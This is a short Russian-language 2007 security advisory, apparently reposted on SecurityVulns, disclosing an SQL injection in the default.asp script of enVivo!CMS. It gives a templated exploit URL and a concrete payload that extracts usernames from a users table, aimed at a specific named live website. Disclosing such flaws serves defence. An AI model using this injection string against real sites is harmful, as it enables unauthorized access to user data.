Информационная безопасность

Уведомление о безопасности: SQL-инъекция в enVivo!CMS
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  AsteriDex  (Asterisk / Trixbox) remote code execution

From:durito <durito_(at)_mail.ru>
Date:6 июля 2007 г.
Subject:SQL-инъекция в enVivo!CMS

Здравствуйте, 3APA3A.

Software:   enVivo!CMS
Vendor:  www.envivosoft.com  
Vulnerability: SQL-инъекция
Risk:  высокий
Date:  6.07.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP:       durito.narod.ru
            www.damagelab.org
                        
+~~~:| Details |:

SQL-инъекция в скрипте default.asp

+~~~:| Экплойт |:

http://www.target.com/default.asp?action=article&ID=[SQL]


+~~~:| Пример |:


http://www.foster-adopt.org/default.asp?action=article&ID=-1+or+1=(SELECT
+TOP+1+username+from+users)--  

--
С уважением,
durito [NGH Group]                 mailto:durito@mail.ru
http://durito.narod.ru
http://ngh.void.ru
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород
 


Rating@Mail.ru